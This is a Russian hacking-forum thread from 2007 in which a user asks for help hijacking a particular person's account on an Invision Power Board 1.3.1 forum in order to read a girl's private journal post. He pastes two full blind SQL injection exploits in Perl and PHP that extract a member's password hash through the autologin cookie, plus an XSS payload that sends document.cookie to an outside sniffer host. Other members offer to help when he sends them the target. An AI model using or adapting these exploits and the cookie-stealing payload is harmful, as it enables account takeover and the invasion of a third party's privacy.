Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Захватить аккаунт пользователя на Invision Power Board v1.3.1 Final |

18.07.2007, 05:30
|
|
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме: 158327
Репутация:
0
|
|
Захватить аккаунт пользователя на Invision Power Board v1.3.1 Final
Помогите, пожалуйста!
Очень срочно надо взломать форум на движке Invision Power Board(U) v1.3.1 Final. Именно 1.3.1!
Мне не надо заливать никаких шеллов, надо просто получить одного пользователя! Всё дело в том, что там стоит журнал mJournal 1.5 и надо прочитать закрытое сообщение девчёнки. От этого зависит моё будущее
Единственное что мне удалось найти - это эксплоит
Код:
#!/usr/bin/perl -w
##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com
##################################################################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";
exit;
}
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '<title>(.*)Log In(.*)</title>';
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current\n";
last;
}
}
if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;
Но как я понимаю, там нужны куки пользователя, под которым хочешь войти?
Ещё попадался такой вот эксплоит
PHP код:
<?php
/*
<= 1.3.1 Final
/str0ke
*/
$server = "SERVER";
$port = 80;
$file = "PATH";
$target = 81;
/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";
$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;
while( !($found) ) {
$letter = substr($hex, $idx, 1);
/* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
$cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
$cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;
/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password='$pass' OR
id=$target
HAVING id=$target AND
MID(`password`,$i,1)='$letter' */
$header = getHeader($server, $port, $file .
"index.php?act=Login&CODE=autologin", $cookie);
if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
echo $i . ": " . $letter . "\n";
$found = true;
$hash .= $letter;
} else {
$idx++;
}
}
}
echo "\n\nFinal Hash: $hash\n";
function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);
if (!$fp) {
return "Unknown";
} else {
$com = "HEAD $file HTTP/1.1\r\n";
$com .= "Host: $server:$port\r\n";
$com .= "Cookie: $cookie\r\n";
$com .= "Connection: close\r\n";
$com .= "\r\n";
fputs($fp, $com);
do {
$header.= fread($fp, 512);
} while( !preg_match('/\r\n\r\n$/',$header) );
}
return $header;
}
?>
// milw0rm.com [2005-06-08]
Пробовал запускать у себя на DENWER - пишит много ошибок про curl. Запустил его с платного арендуемого сервака - скрипт так и не заработал как надо. Что-то долго делал, а потом ошибка, типа скрипт выполнялся дольше 30 секунд. Убрал time_limit - скрипт глухнет наглухо...
Ещё нашёл такую XSS
Код:
http://forum.***.ru/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert(document.cookie)</script>
но
Код:
http://forum.***.ru/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
не даёт желанных результатов
Подскажите, что делать? Есть ли какие-нибудь ещё уязвимости или что я не так делаю с эксплоитами?
|
|
|

18.07.2007, 06:56
|
|
Новичок
Регистрация: 04.07.2007
Сообщений: 26
Провел на форуме: 134504
Репутация:
7
|
|
В последней хсс алерт выдавался?
всмысле окно вылазило?
если да то это ок... тут можо будет использовать для ловли кукис...
дай плз адрес форума- что-нибуть посмотрю.
|
|
|

18.07.2007, 07:05
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме: 7561206
Репутация:
1861
|
|
Скинь ссылку в личку, посмотрю что можно сделать...
|
|
|

19.07.2007, 03:57
|
|
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме: 158327
Репутация:
0
|
|
Сообщение от M0rgan
В последней хсс алерт выдавался?
всмысле окно вылазило?
если да то это ок... тут можо будет использовать для ловли кукис...
дай плз адрес форума- что-нибуть посмотрю.
Алерт выдаёт все куки, а снифер не пашет 
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|